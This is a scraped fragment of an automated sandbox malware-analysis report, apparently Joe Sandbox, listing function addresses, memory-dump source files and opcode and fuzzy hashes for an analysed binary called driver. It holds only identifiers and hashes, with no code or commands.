                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: eac0f101946948d5f46552c7da96ad6c5e5e3c92f0491d035173aa21ff7b2712
                                                                                                                                                                    • Instruction ID: 45601e7e832c384f7a969369c271d0818429a2f1661e05a2e34da91293d66bd7
                                                                                                                                                                    • Opcode Fuzzy Hash: eac0f101946948d5f46552c7da96ad6c5e5e3c92f0491d035173aa21ff7b2712
                                                                                                                                                                    • Instruction Fuzzy Hash: 6421E671F046049BDB14DE6D88843AEBBE9AF84315F1486BBA454A73C6C7BC8F458784
                                                                                                                                                                    Function 00431380 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: dec2a4be3f08e7c27ed22471426066ff0f54172a41e099866c011bb3cfad83ed
                                                                                                                                                                    • Instruction ID: a5137e0aee458948e4020ff43813701d0d01924df36d1d6f2f1ff938bdccc3c3
                                                                                                                                                                    • Opcode Fuzzy Hash: dec2a4be3f08e7c27ed22471426066ff0f54172a41e099866c011bb3cfad83ed
                                                                                                                                                                    • Instruction Fuzzy Hash: B721A5343005046AD704EA7AC9467EEF39ABF88304F54853FA818D26C6DBBD9A168696
                                                                                                                                                                    Function 0040E8CC Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 96bc9c93b9dad51c71c5d45c55ca59b20e988fcdb43c772f6a9732a35bcfa879
                                                                                                                                                                    • Instruction ID: de320097c1a9b311da09f47ab39f91cef4779e5937f02628647fad47707c4561
                                                                                                                                                                    • Opcode Fuzzy Hash: 96bc9c93b9dad51c71c5d45c55ca59b20e988fcdb43c772f6a9732a35bcfa879
                                                                                                                                                                    • Instruction Fuzzy Hash: 77118172B042009FCB44DE2ECCC165A77E5EF88310B2485BAE804EB38ADB75ED118794
                                                                                                                                                                    Function 0040F798 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 874a9eecb7737b57d4668dd3f226b7f59646fba9ae2dc0420c9d0a8699052c8d
                                                                                                                                                                    • Instruction ID: 255e584c7186cd85c9af5383caf37df94b5da4f1e78853719f843dc2e5adc6d1
                                                                                                                                                                    • Opcode Fuzzy Hash: 874a9eecb7737b57d4668dd3f226b7f59646fba9ae2dc0420c9d0a8699052c8d
                                                                                                                                                                    • Instruction Fuzzy Hash: E611EB626041405AEB30B73A8CC0BD726C45F96324F24477FE929EB7C6DB7C584DC26A
                                                                                                                                                                    Function 0043A57C Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f4fe223e1f5972395b031496f0e9d4704ed4edbc5754c5e806a653905e232b61
                                                                                                                                                                    • Instruction ID: 8297425b68668b85c921e27f1b576d8392f5b4d354d956cbc649d99396de610a
                                                                                                                                                                    • Opcode Fuzzy Hash: f4fe223e1f5972395b031496f0e9d4704ed4edbc5754c5e806a653905e232b61
                                                                                                                                                                    • Instruction Fuzzy Hash: 7801D471680305BBE7109B559C82BEE77B8EB4D715F202027FE45A62C1D7B89850C7AF
                                                                                                                                                                    Function 00412C48 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a1fef7987b817ab93b524429b66270e50fead1785cb098f37acdfbd50502ae1b
                                                                                                                                                                    • Instruction ID: fe700c0ab4952e1483e117b6665115ac3aea3f73736c80586d893187e0135f29
                                                                                                                                                                    • Opcode Fuzzy Hash: a1fef7987b817ab93b524429b66270e50fead1785cb098f37acdfbd50502ae1b
                                                                                                                                                                    • Instruction Fuzzy Hash: 75015E31A0025647EF39291847843EE61856B52355F18817BDE48CB34BEAEC8CEAE3D9
                                                                                                                                                                    Function 00438DF8 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 49e2cc261df6c5937bc93ed585a437ece5e2ee56ba448bf493b9fb2d54cd48d6
                                                                                                                                                                    • Instruction ID: abea61cdd4fb34f9c274077297739f2d9a42f02526000cafa8cd403c5ee4efcb
                                                                                                                                                                    • Opcode Fuzzy Hash: 49e2cc261df6c5937bc93ed585a437ece5e2ee56ba448bf493b9fb2d54cd48d6
                                                                                                                                                                    • Instruction Fuzzy Hash: 1A015272A01A214BDB109A38CCA566BB395EB48322B18827EEC04DF34ADB649C004FD8
                                                                                                                                                                    Function 0042B518 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d9eeb580daf0690ff8f82ab0f624c6ca51e74f10b74a3dc8e174b9b8e2487e9e
                                                                                                                                                                    • Instruction ID: e300ffda5f4cc2885d48ed44411ee441b0f1b085b9231bced60fe51c58f937b7
                                                                                                                                                                    • Opcode Fuzzy Hash: d9eeb580daf0690ff8f82ab0f624c6ca51e74f10b74a3dc8e174b9b8e2487e9e
                                                                                                                                                                    • Instruction Fuzzy Hash: 40115A71601614EFDF21CF59EC8479A3BA4FF09359F4840B6ED089E246D3789890CFA5
                                                                                                                                                                    Function 00439320 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8db131ba5a39651d4abdd05e5ed134b92c6c4880b972315bd97e056d013494bc
                                                                                                                                                                    • Instruction ID: 3263c1edf7f5e0d7373dccc30c249ecbf10abb337da2c49d0a4ea98307926f95
                                                                                                                                                                    • Opcode Fuzzy Hash: 8db131ba5a39651d4abdd05e5ed134b92c6c4880b972315bd97e056d013494bc
                                                                                                                                                                    • Instruction Fuzzy Hash: 3A01E17120CA00CBCF14DE19EAC545A73E6EB8C321F58567BEC5CCF249D6749C419E66
                                                                                                                                                                    Function 004313DC Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6b84cdbc8fd2fd01c263766008fbc67afca9df07434401bf09466d9f1ea6aa7d
                                                                                                                                                                    • Instruction ID: 7c7101dd9e2261e715f5c0dc3de3a99e3aa7f35c38785a512cdd4482857f61c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b84cdbc8fd2fd01c263766008fbc67afca9df07434401bf09466d9f1ea6aa7d
                                                                                                                                                                    • Instruction Fuzzy Hash: 6401F93470010466EB04EA6AD4467FEF39AAF88344F20817FA808D3386CBBD9A164697
                                                                                                                                                                    Function 00430E60 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f1c0ba403a8d55f62045e49244dcf0eed5f7a0f43248fbe578ee675584438b66
                                                                                                                                                                    • Instruction ID: e344819b075b998e1b548c1c1f7bebc610f125978399720ee7a372b58991a6df
                                                                                                                                                                    • Opcode Fuzzy Hash: f1c0ba403a8d55f62045e49244dcf0eed5f7a0f43248fbe578ee675584438b66
                                                                                                                                                                    • Instruction Fuzzy Hash: A3017171508A804AEB15CE3998C43C73EC45F5930AF0C85BEDC4D9F247D6B505849BB5
                                                                                                                                                                    Function 0040214C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2691867d5767138c56b061d1cac840a3c1777e0aa78f1d6934e4366d00bf30ee
                                                                                                                                                                    • Instruction ID: e3d3596606603380f7138976bd082313802aad131922af16f15f4c54d6c97994
                                                                                                                                                                    • Opcode Fuzzy Hash: 2691867d5767138c56b061d1cac840a3c1777e0aa78f1d6934e4366d00bf30ee
                                                                                                                                                                    • Instruction Fuzzy Hash: 76F0EC1174835027DB11517E2D8975B9B8C8BD5755F0440BBF645B73C3D4FD4C0A42B9
                                                                                                                                                                    Function 00440EB8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 75c2b70014ed832cc629f7b83b8e4925aeed4df9274d8251771c8e9f5e8ce729
                                                                                                                                                                    • Instruction ID: 6ee3b04a48d973a5bb3eb20359a84c3445d06d9f83aac0a741c61e855d044650
                                                                                                                                                                    • Opcode Fuzzy Hash: 75c2b70014ed832cc629f7b83b8e4925aeed4df9274d8251771c8e9f5e8ce729
                                                                                                                                                                    • Instruction Fuzzy Hash: 81F03938108208DFF750AF62EC8961F3768EB55319F28883FE60581261DF7898A1CA5D
                                                                                                                                                                    Function 00403C78 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: e4158f69be5db5c4f742807c127ae7e974a0140855bb8a8d647212c3b4cbe9e0
                                                                                                                                                                    • Instruction ID: 0eb248996b8f5e7b0b3858746f8ad46448ea615bfe9f972fcf08aa3a0fce00cf
                                                                                                                                                                    • Opcode Fuzzy Hash: e4158f69be5db5c4f742807c127ae7e974a0140855bb8a8d647212c3b4cbe9e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 50E086B174430817D300A9665C83B6BB65C9784325F20463BB515EA3C3DC7DDA0401A8
                                                                                                                                                                    Function 004039B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b393a754cad463262cc0d573031933892f4b291c3642d3602fb737b58db4da88
                                                                                                                                                                    • Instruction ID: 088a9b678e6adc79c35024796c630e9047907c0216cc607f26a1ee31a76d5714
                                                                                                                                                                    • Opcode Fuzzy Hash: b393a754cad463262cc0d573031933892f4b291c3642d3602fb737b58db4da88
                                                                                                                                                                    • Instruction Fuzzy Hash: AEE08C712042042BEB04AD99A882A977B4C9B48365F008067BC4596346D6BADE5483A4
                                                                                                                                                                    Function 00403AD0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 749574446-0
                                                                                                                                                                    • Opcode ID: dd5104ec21632db77bfccb1acd2230f932e0d983213cc522f37143d2952c5d3e
                                                                                                                                                                    • Instruction ID: 852ea7acebefc86807aed7401493887e37693606f36c33a167784ff940e6140f
                                                                                                                                                                    • Opcode Fuzzy Hash: dd5104ec21632db77bfccb1acd2230f932e0d983213cc522f37143d2952c5d3e
                                                                                                                                                                    • Instruction Fuzzy Hash: 14D05B6134030437D7006E7B4C83B167A4E5F58715F00C03A7904AA3D3D9BAD9185108
                                                                                                                                                                    Function 00415B80 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
